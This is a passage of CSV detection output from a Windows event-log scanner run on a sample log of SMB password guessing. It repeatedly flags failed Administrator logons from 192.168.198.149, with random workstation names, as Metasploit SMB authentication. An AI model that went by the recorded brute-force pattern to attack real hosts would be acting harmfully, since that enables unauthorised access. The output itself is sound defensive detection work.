Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 